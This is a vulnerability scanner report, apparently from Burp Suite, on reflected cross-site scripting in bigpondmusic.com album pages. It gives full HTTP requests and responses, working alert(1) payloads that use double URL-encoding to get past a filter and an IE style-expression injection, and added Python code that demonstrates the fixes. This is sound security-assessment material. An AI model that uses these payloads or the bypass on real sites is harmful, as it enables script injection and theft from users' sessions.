Content-Length: 87833


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumd9b33';a641b115d06';
   s.prop4 = 'massive-attack';
   s.prop5 = 'atlas-air-ep';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.94. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 was submitted in the h parameter. This input was echoed as 9f0a6"style="x:expression(alert(1))"8eeaf2aab30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/massive-attack/atlas-air-ep?h=7647081059f0a6"style%3d"x%3aexpression(alert(1))"8eeaf2aab30 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107499


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Massive Attack - Atlas Air E
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?h=7647081059f0a6"style="x:expression(alert(1))"8eeaf2aab30" />
...[SNIP]...

2.95. http://bigpondmusic.com/album/massive-attack/atlas-air-ep [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/massive-attack/atlas-air-ep

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0802"style="x:expression(alert(1))"d70ff86ab90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/massive-attack/atlas-air-ep?f0802"style%3d"x%3aexpression(alert(1))"d70ff86ab90=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:27:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107490


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Massive Attack - Atlas Air E
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/massive-attack/atlas-air-ep?f0802"style="x:expression(alert(1))"d70ff86ab90=1" />
...[SNIP]...

2.96. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4b4e'%3baede1c38fe1 was submitted in the REST URL parameter 1. This input was echoed as c4b4e';aede1c38fe1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /albumc4b4e'%3baede1c38fe1/mike-posner/cooler-than-me3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88147


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'albumc4b4e';aede1c38fe1';
   s.prop4 = 'mike-posner';
   s.prop5 = 'cooler-than-me3';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.pro
...[SNIP]...

2.97. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac was submitted in the REST URL parameter 1. This input was echoed as fed7f"><script>alert(1)</script>883376e85ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumfed7f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e883376e85ac/mike-posner/cooler-than-me3 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:24:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88125


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumfed7f"><script>alert(1)</script>883376e85ac/mike-posner/cooler-than-me3" />
...[SNIP]...

2.98. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 was submitted in the h parameter. This input was echoed as a8f38"style="x:expression(alert(1))"76db599ad81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mike-posner/cooler-than-me3?h=694323401a8f38"style%3d"x%3aexpression(alert(1))"76db599ad81 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:24:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105771


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mike Posner - Cooler Than Me
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?h=694323401a8f38"style="x:expression(alert(1))"76db599ad81" />
...[SNIP]...

2.99. http://bigpondmusic.com/album/mike-posner/cooler-than-me3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/mike-posner/cooler-than-me3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b9d9"style="x:expression(alert(1))"39133f9d96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /album/mike-posner/cooler-than-me3?9b9d9"style%3d"x%3aexpression(alert(1))"39133f9d96c=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:22:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 105430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Mike Posner - Cooler Than Me
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/mike-posner/cooler-than-me3?9b9d9"style="x:expression(alert(1))"39133f9d96c=1" />
...[SNIP]...

2.100. http://bigpondmusic.com/album/nelly/5-0-deluxe [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14 was submitted in the REST URL parameter 1. This input was echoed as d31e9"><script>alert(1)</script>c1e077d3c14 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server decodes %253c to %3c, which passes the filter, and the application's own second decode then produces <.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /albumd31e9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e077d3c14/nelly/5-0-deluxe HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87913


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/albumd31e9"><script>alert(1)</script>c1e077d3c14/nelly/5-0-deluxe" />
...[SNIP]...
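
The double-decoding bypass described in 2.100 (and repeated in 2.105 and 2.109) is easiest to see with the decode steps laid out. The following is an added example, not code from the report or from bigpondmusic.com: the blocklist, the filter and the two pipelines are assumptions that model the behaviour the scanner observed, since the application's source is not available. Only the payload and its echoed form are taken from the report.

```python
from typing import Optional
from urllib.parse import unquote

# REST URL parameter 1 exactly as submitted in issue 2.100 (from the report).
DOUBLE_ENCODED = ("d31e9%2522%253e%253cscript%253ealert%25281%2529"
                  "%253c%252fscript%253ec1e077d3c14")

# Characters a simple XSS blocklist might reject. Assumed: the real
# application's blocklist is not known, only that it stops a once-encoded "<".
BLOCKED = set('<>"\'')


def passes_blocklist(value: str) -> bool:
    """True when none of the blocked characters appear in value."""
    return not (BLOCKED & set(value))


def vulnerable_pipeline(raw_segment: str) -> Optional[str]:
    """Model of the observed behaviour: the web server decodes the path once,
    the application validates that result, then performs its own second
    decode before echoing the value into HTML. Returns the echoed value,
    or None when the blocklist rejects the request."""
    once = unquote(raw_segment)          # done by IIS / ASP.NET
    if not passes_blocklist(once):       # validation sees %3c, not <
        return None
    return unquote(once)                 # second decode turns %3c into <


def hardened_pipeline(raw_segment: str,
                      custom_second_decode: bool = False) -> Optional[str]:
    """The report's remediation: do not decode a second time unless the
    application really needs to, and in any case validate only after all
    canonicalisation is finished. Output encoding at the sink still applies."""
    value = unquote(raw_segment)
    if custom_second_decode:             # only if a second decode is required
        value = unquote(value)
    if not passes_blocklist(value):      # validation sees the final form
        return None
    return value


if __name__ == "__main__":
    print("single-encoded <script>:", vulnerable_pipeline("%3cscript%3e"))
    print("double-encoded payload :", vulnerable_pipeline(DOUBLE_ENCODED))
    print("hardened, one decode   :", hardened_pipeline(DOUBLE_ENCODED))
    print("hardened, two decodes  :", hardened_pipeline(DOUBLE_ENCODED, True))
```

Run as a script, the vulnerable pipeline rejects the single-encoded form but echoes the double-encoded one exactly as the report shows (`d31e9"><script>alert(1)</script>c1e077d3c14`); the hardened pipeline either leaves the value once-decoded and harmless, or, when a second decode is genuinely needed, rejects it because validation now sees the real `<`.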

2.101. http://bigpondmusic.com/album/nelly/5-0-deluxe [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c014'%3babb2e6a640f was submitted in the REST URL parameter 1. This input was echoed as 4c014';abb2e6a640f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /album4c014'%3babb2e6a640f/nelly/5-0-deluxe HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:19:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88199


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
trabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'album4c014';abb2e6a640f';
   s.prop4 = 'nelly';
   s.prop5 = '5-0-deluxe';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' +
...[SNIP]...
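
Issues 2.99, 2.102 and 2.103 (and their repeats for the other album pages) all land in the same sink, the double-quoted value of the parentUrl hidden input, while 2.101, 2.104, 2.108 and 2.112 land in the single-quoted s.channel JavaScript string. The following is an added example, not code from the report or from bigpondmusic.com: the two vulnerable builders are an assumption about how the observed markup was produced (plain string concatenation, which is what the echoed output implies), and beside each sits the context-appropriate encoding that closes the hole. The payload strings are copied from the report; the parser-based checks stand in for the scanner's own verification step.

```python
import html
import json
from html.parser import HTMLParser

# Reflected values copied from the report (issue 2.99 and issue 2.101).
ATTR_PAYLOAD = '9b9d9"style="x:expression(alert(1))"39133f9d96c'
PARENT_URL = ("http://bigpondmusic.com/album/mike-posner/cooler-than-me3?"
              + ATTR_PAYLOAD + "=1")
JS_PAYLOAD = "album4c014';abb2e6a640f"


# --- sink 1: HTML attribute, double-quoted -------------------------------

def vulnerable_hidden_input(parent_url: str) -> str:
    """Assumed original: the request URL is concatenated straight into the
    attribute value, so a " in the URL ends the value and starts new attributes."""
    return '<input type="hidden" name="parentUrl" value="' + parent_url + '" />'


def hardened_hidden_input(parent_url: str) -> str:
    """Attribute context: HTML-encode & < > " ' so the value cannot close the
    attribute. The IE expression() trick then has no style attribute to live in."""
    return ('<input type="hidden" name="parentUrl" value="'
            + html.escape(parent_url, quote=True) + '" />')


class _InputAttributes(HTMLParser):
    """Collects the attributes of the first <input> tag, as a browser would."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input" and not self.attrs:
            self.attrs = dict(attrs)


def parsed_input_attributes(markup: str) -> dict:
    """Return {attribute name: value} for the rendered <input>. This is the
    check the scanner effectively performs: did the payload create a new attribute?"""
    parser = _InputAttributes()
    parser.feed(markup)
    parser.close()
    return parser.attrs


# --- sink 2: JavaScript string, single-quoted ----------------------------

def vulnerable_channel_assignment(channel: str) -> str:
    """Assumed original: path segment concatenated into a single-quoted literal."""
    return "s.channel = '" + channel + "';"


def hardened_channel_assignment(channel: str) -> str:
    """Script context: emit a JSON string literal (quotes and backslashes are
    escaped) and additionally escape < and / so the output can never contain a
    literal </script> that would end the enclosing script block."""
    literal = json.dumps(channel).replace("<", "\\u003c").replace("/", "\\/")
    return "s.channel = " + literal + ";"


def channel_literal_value(statement: str) -> str:
    """Decode the literal emitted by hardened_channel_assignment: the browser
    sees exactly the original string, escaping notwithstanding."""
    return json.loads(statement[len("s.channel = "):-1])


def text_after_string_literal(statement: str) -> str:
    """Scan `s.channel = <literal>...` the way a JS tokenizer would and return
    whatever follows the first complete string literal. Safe output leaves
    only the terminating ';'; anything else would be executed as code."""
    i = statement.index("=") + 1
    while statement[i] == " ":
        i += 1
    quote = statement[i]
    i += 1
    while i < len(statement):
        if statement[i] == "\\":       # escaped character: skip it
            i += 2
            continue
        if statement[i] == quote:
            return statement[i + 1:]
        i += 1
    return ""                          # unterminated literal


if __name__ == "__main__":
    print(sorted(parsed_input_attributes(vulnerable_hidden_input(PARENT_URL))))
    print(sorted(parsed_input_attributes(hardened_hidden_input(PARENT_URL))))
    print(repr(text_after_string_literal(vulnerable_channel_assignment(JS_PAYLOAD))))
    print(repr(text_after_string_literal(hardened_channel_assignment(JS_PAYLOAD))))
```

The vulnerable attribute builder yields a tag with a `style` attribute the page author never wrote; the hardened one yields only `type`, `name` and `value`, and the parsed `value` round-trips to the original URL. For the script sink, the vulnerable builder leaves `;abb2e6a640f';` dangling after the closed string, which is exactly the report's `'album4c014';abb2e6a640f'`, while the hardened builder leaves only the `;`. Encoding for the JavaScript string context is the fallback when, as the remediation note says, the value cannot be kept out of the script block altogether.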

2.102. http://bigpondmusic.com/album/nelly/5-0-deluxe [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The value of the h request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 was submitted in the h parameter. This input was echoed as c434d"style="x:expression(alert(1))"f7c0d253232 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC shown uses a dynamically evaluated CSS expression in an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers; the underlying defect, an unencoded double quote that closes the attribute value, is not browser-specific.

Request

GET /album/nelly/5-0-deluxe?h=771623980c434d"style%3d"x%3aexpression(alert(1))"f7c0d253232 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:19:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 124979


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Nelly - 5.0 Deluxe - BigPond
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/album/nelly/5-0-deluxe?h=771623980c434d"style="x:expression(alert(1))"f7c0d253232" />
...[SNIP]...

2.103. http://bigpondmusic.com/album/nelly/5-0-deluxe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /album/nelly/5-0-deluxe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eeab"style%3d"x%3aexpression(alert(1))"e125ad515ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5eeab"style="x:expression(alert(1))"e125ad515ce in the application's response.

